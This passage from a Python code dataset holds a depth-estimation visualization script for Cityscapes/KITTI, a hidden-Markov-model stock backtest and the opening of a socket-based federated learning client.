:]\n if semanticMap is not None:\n semanticMap = semanticMap.cpu().numpy()\n semanticMap = semanticMap.flatten()\n semanticMap[semanticMap == 255] = 19\n colors = self.colorMap[semanticMap, np.arange(self.xx.shape[0]), :]\n if mask is not None:\n colors = colors[mask, :]\n\n\n camPos = (np.linalg.inv(extrinsic) @ np.array([0,0,0,1]).T).T\n veh_coord[:, 0:3] = veh_coord[:, 0:3] - np.repeat(np.expand_dims(camPos, 0)[:,0:3], veh_coord.shape[0], 0)\n veh_coord_2[:, 0:3] = veh_coord_2[:, 0:3] - np.repeat(np.expand_dims(camPos, 0)[:,0:3], veh_coord_2.shape[0], 0)\n\n tmpImgName = 'tmp1.png'\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.view_init(elev=6., azim=170)\n ax.dist = 4\n if colors is None:\n ax.scatter(veh_coord[0::100,0], veh_coord[0::100,1], veh_coord[0::100,2], s=0.1, c = 'b')\n ax.scatter(veh_coord_2[0::100, 0], veh_coord_2[0::100, 1], veh_coord_2[0::100, 2], s=0.1, c='r')\n else:\n ax.scatter(veh_coord_2[0::50, 0], veh_coord_2[0::50, 1], veh_coord_2[0::50, 2], s=0.5, c = colors[0::50, :])\n ax.scatter(camPos[0], camPos[1], camPos[2], s=10, c='g')\n ax.set_zlim(-10, 10)\n plt.ylim([-10, 10])\n plt.xlim([10, 16])\n set_axes_equal(ax)\n fig.savefig(tmpImgName)\n plt.close(fig)\n img1 = pil.open(tmpImgName)\n\n tmpImgName = 'tmp2.png'\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.view_init(elev=6., azim=170)\n ax.dist = 4\n if colors is None:\n ax.scatter(veh_coord[0::100,0], veh_coord[0::100,1], 
veh_coord[0::100,2], s=0.1, c = 'b')\n ax.scatter(veh_coord_2[0::100, 0], veh_coord_2[0::100, 1], veh_coord_2[0::100, 2], s=0.1, c='r')\n else:\n ax.scatter(veh_coord[0::50,0], veh_coord[0::50,1], veh_coord[0::50,2], s=0.5, c = colors[0::50, :])\n ax.scatter(camPos[0], camPos[1], camPos[2], s=10, c='g')\n ax.set_zlim(-10, 10)\n plt.ylim([-10, 10])\n plt.xlim([10, 16])\n set_axes_equal(ax)\n fig.savefig(tmpImgName)\n plt.close(fig)\n img2 = pil.open(tmpImgName)\n img = Image.fromarray(np.concatenate([np.array(img1)[:,:,0:3], np.array(img2)[:,:,0:3]], axis=1))\n\n return img, veh_coord, veh_coord_2\n\nclass Comp1dgrad(nn.Module):\n def __init__(self):\n super(Comp1dgrad, self).__init__()\n self.act = nn.Sigmoid()\n self.gradth = 0.1\n self.init_gradconv()\n # self.init_gaussconv(kernel_size=3, sigma=2, channels=1)\n\n\n\n # def init_gaussconv(self, kernel_size=3, sigma=2, channels=1):\n # self.gaussconv = get_gaussian_kernel(kernel_size=kernel_size, sigma=sigma, channels=channels)\n # self.gaussconv.cuda()\n def init_gradconv(self):\n weightsx = torch.Tensor([[-1., 0., 1.],\n [-2., 0., 2.],\n [-1., 0., 1.]]).unsqueeze(0).unsqueeze(0)\n\n weightsy = torch.Tensor([[1., 2., 1.],\n [0., 0., 0.],\n [-1., -2., -1.]]).unsqueeze(0).unsqueeze(0)\n self.convx = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=3, padding=0, bias=False)\n self.convy = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=3, padding=0, bias=False)\n\n self.convx.weight = nn.Parameter(weightsx,requires_grad=False)\n self.convy.weight = nn.Parameter(weightsy,requires_grad=False)\n\n self.convx.cuda()\n self.convy.cuda()\n # self.gaussKernel =\n def forward(self, tensor, boot = 1):\n # tensor_blurred = self.gaussconv(tensor)\n tensor_blurred = tensor\n grad_x = torch.abs(self.convx(tensor_blurred))\n grad_y = torch.abs(self.convy(tensor_blurred))\n # grad = (grad_x + grad_y - 0.012) / tensor_blurred[:,:,1:-1,1:-1] * 200 - 6\n grad = (grad_x + grad_y - 0.012) / tensor_blurred[:, :, 1:-1, 1:-1] * 10 - 6\n grad = self.act(grad)\n # vmax = np.percentile(grad.cpu().numpy(), 99)\n # a = grad.cpu().numpy()\n\n # grad_x = torch.abs(tensor[:, :, :-1, :-1] - tensor[:, :, :-1, 1:])\n # grad_y = torch.abs(tensor[:, :, :-1, :-1] - tensor[:, :, 1:, :-1])\n # grad = (grad_x + grad_y) * boostParam\n # grad = self.act(grad)\n # tensor2disp(grad, ind = 0, vmax=1).show()\n # tensor2disp(tensor, ind = 0).show()\n return grad\n\n\ndef evaluate(opt):\n \"\"\"Evaluates a pretrained model using a specified test set\n \"\"\"\n MIN_DEPTH = 1e-3\n MAX_DEPTH = 80\n\n opt.load_weights_folder = os.path.expanduser(opt.load_weights_folder)\n\n assert os.path.isdir(opt.load_weights_folder), \\\n \"Cannot find a folder at {}\".format(opt.load_weights_folder)\n\n print(\"-> Loading weights from {}\".format(opt.load_weights_folder))\n\n filenames = readlines(os.path.join(splits_dir, opt.split, \"val_files.txt\"))\n encoder_path = os.path.join(opt.load_weights_folder, \"encoder.pth\")\n decoder_path = os.path.join(opt.load_weights_folder, \"depth.pth\")\n\n encoder_dict = torch.load(encoder_path)\n\n if opt.use_stereo:\n opt.frame_ids.append(\"s\")\n if opt.dataset == 'cityscape':\n dataset = datasets.CITYSCAPERawDataset(opt.data_path, filenames,\n encoder_dict['height'], encoder_dict['width'], opt.frame_ids, 4, is_train=False, tag=opt.dataset, load_meta=True, is_sep_train_seman = False)\n elif opt.dataset == 'kitti':\n dataset = datasets.KITTIRAWDataset(opt.data_path, filenames,\n encoder_dict['height'], encoder_dict['width'], opt.frame_ids, 4, 
is_train=False, tag=opt.dataset)\n else:\n raise ValueError(\"No predefined dataset\")\n dataloader = DataLoader(dataset, batch_size=opt.batch_size, shuffle=False, num_workers=opt.num_workers,\n pin_memory=True, drop_last=True)\n\n encoder = networks.ResnetEncoder(opt.num_layers, False)\n if opt.switchMode == 'on':\n depth_decoder = networks.DepthDecoder(encoder.num_ch_enc, isSwitch=True, isMulChannel=opt.isMulChannel)\n else:\n depth_decoder = networks.DepthDecoder(encoder.num_ch_enc)\n\n model_dict = encoder.state_dict()\n encoder.load_state_dict({k: v for k, v in encoder_dict.items() if k in model_dict})\n depth_decoder.load_state_dict(torch.load(decoder_path))\n\n encoder.cuda()\n encoder.eval()\n depth_decoder.cuda()\n depth_decoder.eval()\n\n # x = torch.ones(2, 2, requires_grad=True)\n # print(x)\n # y = x + 2 + x\n # y = y.detach()\n # print(y)\n # z = y * y * 3\n # out = z.mean()\n # print(z, out)\n # out.backward()\n # print(x.grad)\n\n ##--------------------Visualization parameter here----------------------------##\n sfx = torch.nn.Softmax(dim=1)\n mergeDisp = Merge_MultDisp(opt.scales, batchSize = opt.batch_size, isMulChannel = opt.isMulChannel)\n svRoot = '/media/shengjie/other/sceneUnderstanding/monodepth2/internalRe/figure_visual'\n index = 0\n isvisualize = True\n viewEdgeMerge = False\n isHist = False\n useGtSeman = True\n viewSurfaceNormal = True\n viewSelfOcclu = True\n viewDispUp = True\n viewSmooth = True\n viewMulReg = True\n viewBorderRegress = False\n viewBorderSimilarity = False\n viewRandomSample = True\n viewSemanReg = False\n viewDepthGuess = False\n height = 256\n width = 512\n tensor23dPts = Tensor23dPts()\n\n if isHist:\n rec = np.zeros((19,100))\n\n if opt.isMulChannel:\n app = os.path.join('mulDispOn', opt.model_name)\n else:\n app = os.path.join('mulDispOff', opt.model_name)\n\n dirpath = os.path.join(svRoot, app)\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)\n\n if viewEdgeMerge:\n comp1dgrad = Comp1dgrad().cuda()\n\n if viewSurfaceNormal:\n compsn = ComputeSurfaceNormal(height = height, width = width, batch_size = opt.batch_size).cuda()\n\n if viewSelfOcclu:\n selfclu = SelfOccluMask().cuda()\n\n with torch.no_grad():\n for idx, inputs in enumerate(dataloader):\n # if idx != 12:\n # continue\n for key, ipt in inputs.items():\n if not(key == 'height' or key == 'width' or key == 'tag' or key == 'cts_meta'):\n inputs[key] = ipt.to(torch.device(\"cuda\"))\n input_color = inputs[(\"color\", 0, 0)].cuda()\n # input_color = torch.flip(input_color, dims=[3])\n features = encoder(input_color)\n outputs = dict()\n outputs.update(depth_decoder(features, computeSemantic=True, computeDepth=False))\n outputs.update(depth_decoder(features, computeSemantic=False, computeDepth=True))\n\n # view the processed semantic seperate training data\n # for viewInd in range(opt.batch_size):\n # label = inputs['semanTrain_label']\n # visualize_semantic(label[viewInd, 0, :, :].cpu().numpy()).show()\n # fig_rgb = inputs['semanTrain_rgb'][viewInd, :, :, :].permute(1, 2, 0).cpu().numpy()\n # fig_rgb = (fig_rgb * 255).astype(np.uint8)\n # fig_rgb = pil.fromarray(fig_rgb)\n # fig_rgb.show()\n\n\n if isHist:\n mulDisp = outputs[('mul_disp', 0)]\n scaled_disp, mulDepth = disp_to_depth(mulDisp, 0.1, 100)\n mulDepth = mulDepth.cpu()\n for i in range(mulDisp.shape[1]):\n rec[i,:] += torch.histc(mulDepth[:,i,:,:],bins=100,min=0,max=100).numpy()\n\n if isvisualize:\n if useGtSeman:\n # outputs[('mul_disp', 0)][:,2,:,:] = outputs[('mul_disp', 0)][:,2,:,:] * 0\n # outputs[('mul_disp', 
0)][:, 12, :, :] = outputs[('mul_disp', 0)][:, 12, :, :] * 0\n mergeDisp(inputs, outputs, eval=False)\n else:\n mergeDisp(inputs, outputs, eval=True)\n\n dispMap = outputs[('disp', 0)]\n scaled_disp, depthMap = disp_to_depth(dispMap, 0.1, 100)\n depthMap = depthMap * STEREO_SCALE_FACTOR\n # _, mul_depthMap = disp_to_depth(outputs[('mul_disp', 0)], 0.1, 100)\n # mul_depthMap = mul_depthMap * STEREO_SCALE_FACTOR\n\n if viewDispUp:\n fig_dispup = compDispUp.visualize(scaled_disp, viewindex=index)\n\n if viewSmooth:\n rgb = inputs[('color_aug', 0, 0)]\n smoothfig = comSmooth.visualize(rgb=rgb, disp=scaled_disp, viewindex=index)\n\n if useGtSeman:\n fig_seman = tensor2semantic(inputs['seman_gt'], ind=index, isGt=True)\n else:\n fig_seman = tensor2semantic(outputs[('seman', 0)], ind=index)\n\n if viewSemanReg:\n foregroundType = [11, 12, 13, 14, 15, 16, 17, 18] # person, rider, car, truck, bus, train, motorcycle, bicycle\n softmaxedSeman = F.softmax(outputs[('seman', 0)], dim=1)\n forePredMask = torch.sum(softmaxedSeman[:,foregroundType,:,:], dim=1, keepdim=True)\n foreGtMask = torch.ones(dispMap.shape).cuda().byte()\n\n for m in foregroundType:\n foreGtMask = foreGtMask * (inputs['seman_gt'] != m)\n foreGtMask = 1 - foreGtMask\n foreGtMask = foreGtMask.float()\n\n forePredMask[forePredMask > 0.5] = 1\n forePredMask[forePredMask <= 0.5] = 0\n\n forePredMask = foreGtMask\n rdSampleSeman.visualizeBorderSample(dispMap, forePredMask, gtMask=foreGtMask, viewIndex=index)\n\n\n cm = plt.get_cmap('magma')\n viewForePred = forePredMask[index, :, :, :].squeeze(0).detach().cpu().numpy()\n viewForePred = (cm(viewForePred) * 255).astype(np.uint8)\n # pil.fromarray(viewForePred).show()\n\n viewForeGt = foreGtMask[index, :, :, :].squeeze(0).detach().cpu().numpy()\n viewForeGt = (cm(viewForeGt) * 255).astype(np.uint8)\n # pil.fromarray(viewForeGt).show()\n forePredictCombined = np.concatenate([viewForePred, viewForeGt], axis=0)\n # pil.fromarray(forePredictCombined).show()\n pil.fromarray(forePredictCombined).save(os.path.join(dirpath, str(idx) + '_fg.png'))\n\n if viewDepthGuess:\n wallType = [2, 3, 4] # Building, wall, fence\n roadType = [0, 1, 9] # road, sidewalk, terrain\n foregroundType = [5, 6, 7, 11, 12, 13, 14, 15, 16, 17, 18] # pole, traffic light, traffic sign, person, rider, car, truck, bus, train, motorcycle, bicycle\n\n wallTypeMask = torch.ones(dispMap.shape).cuda().byte()\n roadTypeMask = torch.ones(dispMap.shape).cuda().byte()\n foreGroundMask = torch.ones(dispMap.shape).cuda().byte()\n\n with torch.no_grad():\n for m in wallType:\n wallTypeMask = wallTypeMask * (inputs['seman_gt'] != m)\n wallTypeMask = (1 - wallTypeMask).float()\n\n for m in roadType:\n roadTypeMask = roadTypeMask * (inputs['seman_gt'] != m)\n roadTypeMask = (1 - roadTypeMask).float()\n\n for m in foregroundType:\n foreGroundMask = foreGroundMask * (inputs['seman_gt'] != m)\n foreGroundMask = (1 - foreGroundMask).float()\n originalSieze = [2048, 1024]\n # currentSize = np.array([dispMap.shape[3], dispMap.shape[2]])\n # scaleFac = np.eye(4)\n # scaleFac[0,0] = currentSize[0] / originalSieze[0]\n # scaleFac[1,1] = currentSize[1] / originalSieze[1]\n # scaleFac = torch.Tensor(scaleFac).view(1,4,4).repeat(opt.batch_size, 1, 1).cuda()\n # scaledIntrinsic = scaleFac @ inputs['realIn']\n scaledIntrinsic = inputs['realIn']\n depthGuess.visualizeDepthGuess(realDepth=depthMap, dispAct=dispMap, foredgroundMask = foreGroundMask, wallTypeMask=wallTypeMask, groundTypeMask=roadTypeMask, intrinsic= scaledIntrinsic, extrinsic=inputs['realEx'], 
semantic = inputs['seman_gt_eval'], cts_meta = inputs['cts_meta'], viewInd=index)\n # realDepth, foredgroundMask, wallTypeMask, groundTypeMask, intrinsic, extrinsic\n\n fig_rgb = tensor2rgb(inputs[('color', 0, 0)], ind=index)\n fig_disp = tensor2disp(outputs[('disp', 0)], ind=index)\n fig_3d, veh_coord, veh_coord_gt = tensor23dPts.visualize3d(depthMap, ind = index, intrinsic= inputs['cts_meta']['intrinsic'][index, :, :], extrinsic= inputs['cts_meta']['extrinsic'][index, :, :], gtmask=inputs['cts_meta']['mask'][index, :, :], gtdepth=inputs['cts_meta']['depthMap'][index, :, :], semanticMap=inputs['seman_gt_eval'][index, :, :])\n # check:\n # torch.inverse(inputs['invcamK'][index, :, :] @ inputs['realIn'][index, :, :]) - inputs['cts_meta']['extrinsic'][index, :, :]\n fig_grad = None\n\n if viewSurfaceNormal:\n # surnorm = compsn.visualize(depthMap = depthMap, invcamK = inputs['invcamK'].cuda(), orgEstPts = veh_coord, gtEstPts = veh_coord_gt, viewindex = index)\n surnorm = compsn.visualize(depthMap=depthMap, invcamK=inputs['invcamK'].cuda(), orgEstPts=veh_coord,\n gtEstPts=veh_coord_gt, viewindex=index)\n surnormMap = compsn(depthMap=depthMap, invcamK=inputs['invcamK'].cuda())\n\n if viewMulReg:\n depthMapLoc = depthMap / STEREO_SCALE_FACTOR\n skyId = 10\n skyMask = inputs['seman_gt'] == skyId\n skyerr = objReg.visualize_regularizeSky(depthMapLoc, skyMask, viewInd=index)\n\n\n wallType = [2, 3, 4] # Building, wall, fence\n roadType = [0, 1, 9] # road, sidewalk, terrain\n permuType = [5, 7] # Pole, traffic sign\n chanWinSize = 5\n\n wallMask = torch.ones_like(skyMask)\n roadMask = torch.ones_like(skyMask)\n permuMask = torch.ones_like(skyMask)\n\n with torch.no_grad():\n for m in wallType:\n wallMask = wallMask * (inputs['seman_gt'] != m)\n wallMask = 1 - wallMask\n wallMask = wallMask[:,:,1:-1,1:-1]\n\n for m in roadType:\n roadMask = roadMask * (inputs['seman_gt'] != m)\n roadMask = 1 - roadMask\n roadMask = roadMask[:,:,1:-1,1:-1]\n\n for m in permuType:\n permuMask = permuMask * (inputs['seman_gt'] != m)\n permuMask = 1 - permuMask\n permuMask = permuMask[:,:,1:-1,1:-1]\n\n BdErrFig, viewRdErrFig = objReg.visualize_regularizeBuildingRoad(surnormMap, wallMask, roadMask, dispMap, viewInd=index)\n\n\n padSize = int((chanWinSize-1) / 2)\n permuMask = permuMask[:, :, padSize : -padSize, padSize : -padSize]\n surVarFig = objReg.visualize_regularizePoleSign(surnormMap, permuMask, dispMap, viewInd=index)\n\n if viewBorderRegress:\n foregroundType = [5, 6, 7, 11, 12, 13, 14, 15, 16, 17, 18] # pole, traffic light, traffic sign, person, rider, car, truck, bus, train, motorcycle, bicycle\n backgroundType = [0, 1, 2, 3, 4, 8, 9, 10] # road, sidewalk, building, wall, fence, vegetation, terrain, sky\n suppressType = [255] # Suppress no label lines\n # foreGroundMask = torch.sum(inputs['seman_gt'][:, foregroundType, :, :], dim=1, keepdim=True)\n # backGroundMask = torch.sum(inputs['seman_gt'][:, backgroundType, :, :], dim=1, keepdim=True)\n foreGroundMask = torch.ones(dispMap.shape).cuda().byte()\n backGroundMask = torch.ones(dispMap.shape).cuda().byte()\n suppresMask = torch.ones(dispMap.shape).cuda().byte()\n\n with torch.no_grad():\n for m in foregroundType:\n foreGroundMask = foreGroundMask * (inputs['seman_gt'] != m)\n foreGroundMask = 1 - foreGroundMask\n for m in backgroundType:\n backGroundMask = backGroundMask * (inputs['seman_gt'] != m)\n backGroundMask = 1 - backGroundMask\n for m in suppressType:\n suppresMask = suppresMask * (inputs['seman_gt'] != m)\n suppresMask = 1 - suppresMask\n 
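                        # the loops above accumulate, per pixel, the test: matches none of the listed ids;\n                        # the 1 - mask flips then turn each result into a union mask over its id list\n                        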
suppresMask = suppresMask.float()\n combinedMask = torch.cat([foreGroundMask, backGroundMask], dim=1).float()\n\n # borderRegFig = borderRegress.visualize_computeBorder(dispMap, combinedMask, suppresMask = suppresMask, viewIndex=index)\n borderRegFig = None\n\n else:\n borderRegFig = None\n\n # if viewBorderSimilarity:\n # foregroundType = [5, 6, 7, 11, 12, 13, 14, 15, 16, 17,\n # 18] # pole, traffic light, traffic sign, person, rider, car, truck, bus, train, motorcycle, bicycle\n # backgroundType = [0, 1, 2, 3, 4, 8, 9,\n # 10] # road, sidewalk, building, wall, fence, vegetation, terrain, sky\n # suppressType = [255] # Suppress no label lines\n # foreGroundMask = torch.ones(dispMap.shape).cuda().byte()\n # backGroundMask = torch.ones(dispMap.shape).cuda().byte()\n # suppresMask = torch.ones(dispMap.shape).cuda().byte()\n #\n # with torch.no_grad():\n # for m in foregroundType:\n # foreGroundMask = foreGroundMask * (inputs['seman_gt'] != m)\n # foreGroundMask = 1 - foreGroundMask\n # for m in backgroundType:\n # backGroundMask = backGroundMask * (inputs['seman_gt'] != m)\n # backGroundMask = 1 - backGroundMask\n # for m in suppressType:\n # suppresMask = suppresMask * (inputs['seman_gt'] != m)\n # suppresMask = 1 - suppresMask\n # suppresMask = suppresMask.float()\n # combinedMask = torch.cat([foreGroundMask, backGroundMask], dim=1).float()\n #\n # borderSimFig = borderSim.visualize_borderSimilarity(dispMap, foreGroundMask.float(), suppresMask = suppresMask, viewIndex=index)\n\n if viewRandomSample:\n foregroundType = [5, 6, 7, 11, 12, 13, 14, 15, 16, 17, 18] # pole, traffic light, traffic sign, person, rider, car, truck, bus, train, motorcycle, bicycle\n backgroundType = [0, 1, 2, 3, 4, 8, 9, 10] # road, sidewalk, building, wall, fence, vegetation, terrain, sky\n suppressType = [255] # Suppress no label lines\n foreGroundMask = torch.ones(dispMap.shape).cuda().byte()\n backGroundMask = torch.ones(dispMap.shape).cuda().byte()\n suppresMask = torch.ones(dispMap.shape).cuda().byte()\n\n with torch.no_grad():\n for m in foregroundType:\n foreGroundMask = foreGroundMask * (inputs['seman_gt'] != m)\n foreGroundMask = 1 - foreGroundMask\n for m in suppressType:\n suppresMask = suppresMask * (inputs['seman_gt'] != m)\n suppresMask = 1 - suppresMask\n suppresMask = suppresMask.float()\n foreGroundMask = foreGroundMask.float()\n\n rdSampleOnBorder.visualize_randomSample(dispMap, foreGroundMask, suppresMask, viewIndex=index)\n # rdSampleOnBorder.randomSampleReg(dispMap, foreGroundMask)\n\n\n if viewEdgeMerge:\n grad_disp = comp1dgrad(outputs[('mul_disp', 0)])\n fig_grad = tensor2disp(grad_disp, ind = index, vmax=1)\n fig_grad = fig_grad.resize([512, 256])\n\n if viewSelfOcclu:\n fl = inputs[(\"K\", 0)][:, 0, 0]\n bs = torch.abs(inputs[\"stereo_T\"][:, 0, 3])\n clufig, suppressedDisp = selfclu.visualize(dispMap, viewind=index)\n\n\n if fig_grad is not None:\n grad_seman = (np.array(fig_grad)[:, :, 0:3].astype(np.float) * 0.7 + np.array(fig_seman).astype(np.float) * 0.3).astype(np.uint8)\n # combined = [np.array(fig_disp)[:, :, 0:3], np.array(fig_grad)[:, :, 0:3], np.array(fig_seman), np.array(fig_rgb)]\n combined = [grad_seman, np.array(fig_disp)[:, :, 0:3], np.array(fig_rgb)]\n combined = np.concatenate(combined, axis=1)\n else:\n if viewSurfaceNormal and viewSelfOcclu:\n surnorm = surnorm.resize([512, 256])\n surnorm_mixed = pil.fromarray(\n (np.array(surnorm) * 0.2 + np.array(fig_disp)[:, :, 0:3] * 0.8).astype(np.uint8))\n disp_seman = (np.array(fig_disp)[:, :, 0:3].astype(np.float) * 0.8 + 
np.array(fig_seman).astype(\n np.float) * 0.2).astype(np.uint8)\n supprressed_disp_seman = (np.array(suppressedDisp)[:, :, 0:3].astype(np.float) * 0.8 + np.array(fig_seman).astype(\n np.float) * 0.2).astype(np.uint8)\n rgb_seman = (np.array(fig_seman).astype(np.float) * 0.5 + np.array(fig_rgb).astype(\n np.float) * 0.5).astype(np.uint8)\n\n # clud_disp = (np.array(clufig)[:, :, 0:3].astype(np.float) * 0.3 + np.array(fig_disp)[:, :, 0:3].astype(\n # np.float) * 0.7).astype(np.uint8)\n comb1 = np.concatenate([np.array(supprressed_disp_seman)[:, :, 0:3], np.array(suppressedDisp)[:, :, 0:3]], axis=1)\n comb2 = np.concatenate([np.array(disp_seman)[:, :, 0:3], np.array(fig_disp)[:, :, 0:3]], axis=1)\n comb3 = np.concatenate([np.array(surnorm_mixed)[:, :, 0:3], np.array(surnorm)[:, :, 0:3]], axis=1)\n comb4 = np.concatenate([np.array(fig_seman)[:, :, 0:3], np.array(rgb_seman)[:, :, 0:3]],\n axis=1)\n comb6 = np.concatenate([np.array(clufig)[:, :, 0:3], np.array(fig_dispup)[:, :, 0:3]], axis=1)\n\n fig3dsize = np.ceil(np.array([comb4.shape[1] , comb4.shape[1] / fig_3d.size[0] * fig_3d.size[1]])).astype(np.int)\n comb5 = np.array(fig_3d.resize(fig3dsize))\n # combined = np.concatenate([comb1, comb6, comb2, comb3, comb4, comb5], axis=0)\n combined = np.concatenate([comb1, comb2, comb4, comb3], axis=0)\n else:\n disp_seman = (np.array(fig_disp)[:, :, 0:3].astype(np.float) * 0.8 + np.array(fig_seman).astype(np.float) * 0.2).astype(np.uint8)\n rgb_seman = (np.array(fig_seman).astype(np.float) * 0.5 + np.array(fig_rgb).astype(np.float) * 0.5).astype(np.uint8)\n # combined = [np.array(disp_seman)[:,:,0:3], np.array(fig_disp)[:, :, 0:3], np.array(fig_seman), np.array(fig_rgb)]\n combined = [np.array(disp_seman)[:, :, 0:3], np.array(fig_disp)[:, :, 0:3], np.array(fig_seman),\n np.array(rgb_seman)]\n combined = np.concatenate(combined, axis=1)\n\n fig = pil.fromarray(combined)\n # fig.show()\n fig.save(os.path.join(dirpath, str(idx) + '.png'))\n if borderRegFig is not None:\n borderRegFig.save(os.path.join(dirpath, str(idx) + '_borderRegress.png'))\n # fig_3d.save(os.path.join(dirpath, str(idx) + '_fig3d.png'))\n # for k in range(10):\n # fig_disp = tensor2disp(outputs[('disp', 0)], ind=k)\n # fig_rgb = tensor2rgb(inputs[('color', 0, 0)], ind=k)\n # combined = [np.array(fig_disp)[:, :, 0:3], np.array(fig_rgb)]\n # combined = np.concatenate(combined, axis=1)\n # fig = pil.fromarray(combined)\n # fig.save(\n # os.path.join('/media/shengjie/other/sceneUnderstanding/monodepth2/internalRe/MoredispOrg' + str(k) + '.png'))\n\n\n\n # fig_rgb.save(os.path.join(svRoot, app, 'rgb' + str(idx) + '.png'))\n # fig_seman.save(os.path.join(svRoot, app, 'semantic'+ str(idx) + '.png'))\n # fig_disp.save(os.path.join(svRoot, app, 'disp'+ str(idx) + '.png'))\n # a = inputs['seman_gt_eval']\n # scaled_disp, _ = disp_to_depth(outputs[('disp', 0)], 0.1, 100)\n print(\"%dth saved\" % idx)\n # If compute the histogram\n if isHist:\n svPath = '/media/shengjie/other/sceneUnderstanding/monodepth2/internalRe/mul_channel_depth'\n carId = 13\n prob = copy.deepcopy(rec)\n ind = np.arange(prob.shape[1] * 2)\n for i in range(prob.shape[0]):\n prob[i,:] = prob[i,:] / np.sum(prob[i,:])\n for i in range(prob.shape[0]):\n trainStr = trainId2label[i][0]\n fig, ax = plt.subplots()\n rects1 = ax.bar(ind[0::2], prob[carId, :], label='obj:car')\n rects2 = ax.bar(ind[1::2], prob[i, :], label='obj:' + trainStr)\n ax.set_ylabel('Meter in percentile')\n ax.set_xlabel('Meters')\n ax.set_title('Scale Changes between scale car and scale %s' % trainStr)\n 
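            # each figure compares the depth histogram of class i against the car class (carId = 13)\n            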
ax.legend()\n            plt.savefig(os.path.join(svPath, str(i)), dpi=200)\n            plt.close(fig)\n\n\n\nif __name__ == \"__main__\":\n    options = MonodepthOptions()\n    evaluate(options.parse())\n","sub_path":"visualize_cityscape.py","file_name":"visualize_cityscape.py","file_ext":"py","file_size_in_byte":32787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"51486203","text":"from hmmlearn.hmm import GaussianHMM\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport backtesting as bk\nimport pdb\n\nn = 3  # suppose three hidden states\ndl = bk.dataloader.DataLoader()\ndata = dl.get_stock_data('0050', 2005, 1)\ndata = data['2012-01-01':]\nvolume = data['transaction']\nclose = data['close']\nlogDel = np.log(np.array(data['high']) - np.array(data['low']))\nlogRet_1 = np.array(np.diff(np.log(close)))  # used later to compute returns\nlogRet_5 = np.log(np.array(close[5:])) - np.log(np.array(close[:-5]))\nlogVol_5 = np.log(np.array(volume[5:])) - np.log(np.array(volume[:-5]))\nlogDel = logDel[5:]\nlogRet_1 = logRet_1[4:]  # align with the 5-day features and close[5:]\nclose = close[5:]\nDate = pd.to_datetime(data.index[5:])\nA = np.column_stack([logDel, logRet_5, logVol_5])\nA = np.nan_to_num(A)\nA[np.isneginf(A)] = 0\nA[np.isinf(A)] = 0\nmodel = GaussianHMM(n_components=n, covariance_type=\"full\", n_iter=2000).fit(A)\nhidden_states = model.predict(A)\nplt.figure(figsize=(25, 18))\nfor i in range(model.n_components):\n    pos = (hidden_states == i)\n    plt.plot_date(Date[pos], close[pos], 'o', label='hidden state %d' % i, lw=2)\n    plt.legend(loc='upper left')\nplt.show()\nres = pd.DataFrame({'Date': Date, 'logRet_1': logRet_1, 'state': hidden_states}).set_index('Date')\nplt.figure(figsize=(25, 18))\nfor i in range(model.n_components):\n    pos = (hidden_states == i)\n    pos = np.append(0, pos[:-1])  # shift by one day: the buy happens the next day\n    df = res.logRet_1\n    res['state_ret%s' % i] = df.multiply(pos)\n    plt.plot_date(Date, np.exp(res['state_ret%s' % i].cumsum()), '-', label='hidden state %d' % i)\n    plt.legend(loc='upper left')\nplt.show()\nlong = (hidden_states == 0)  # go long in this state\nshort = (hidden_states == 2)  # go short in this state\nlong = np.append(0, long[:-1])  # can only trade on the next day\nshort = np.append(0, short[:-1])  # can only trade on the next day\nres['ret'] = df.multiply(long) - df.multiply(short)\nplt.plot_date(Date, np.exp(res['ret'].cumsum()), 'r-')\nplt.show()\npdb.set_trace()\n","sub_path":"first_test.py","file_name":"first_test.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"196283597","text":"import dill as pickle\nimport socket\nfrom _thread import *\nimport threading\nimport sys\nimport time\nimport os\nimport tensorflow as tf\nimport numpy as np\n\nclient_subscribed = []\nweights_set = []\nlast_client = -1\nconnections = 0\nstatus = \"\"\n\nregister_client_lock = threading.Lock()\nregister_weights_lock = threading.Lock()\nnew_weights_lock = threading.Lock()\npersistentTCP_lock = threading.Lock()\n\nclass FederatedCallback(tf.keras.callbacks.Callback):\n\tdef on_epoch_end(self, epoch, logs=None):\n\t\tglobal signal\n\t\tglobal status\n\t\tif signal:\n\t\t\tprint(\"Training Interrupted\")\n\t\t\tself.model.stop_training = True\n\ndef greetServer(host, port):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"HELLO\"))\n\tmsg = pickle.loads(s.recv(1024))\n\treturn msg\n\ndef subscribeServer(host, port):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"SUBSCRIBE\"))\n\ndef requestModelGen(host, port):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"REQUEST MODEL FUNCTION\"))\n\tsize = 
pickle.loads(s.recv(1024))\n\ts.sendall(pickle.dumps(\"OK\"))\n\tmsg = pickle.loads(recvall(s,size))\n\treturn msg\n\ndef requestPreprocessing(host, port):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"REQUEST PREPROCESSING\"))\n\tsize = pickle.loads(s.recv(1024))\n\ts.sendall(pickle.dumps(\"OK\"))\n\tmsg = pickle.loads(recvall(s,size))\n\treturn msg\n\ndef requestDataCleaner(host, port):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"REQUEST DATA CLEANER\"))\n\tsize = pickle.loads(s.recv(1024))\n\ts.sendall(pickle.dumps(\"OK\"))\n\tmsg = pickle.loads(recvall(s,size))\n\treturn msg\n\ndef requestWeights(host, port):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"REQUEST WEIGHTS\"))\n\tsize = pickle.loads(s.recv(1024))\n\ts.sendall(pickle.dumps(\"OK\"))\n\tmsg = pickle.loads(recvall(s,size))\n\treturn msg\n\ndef sendWeights(host, port, weights):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"SENDING WEIGHTS\"))\n\tack = pickle.loads(s.recv(1024))\n\tif ack == \"OK\":\n\t\tsendObject(s,weights)\n\n\ndef 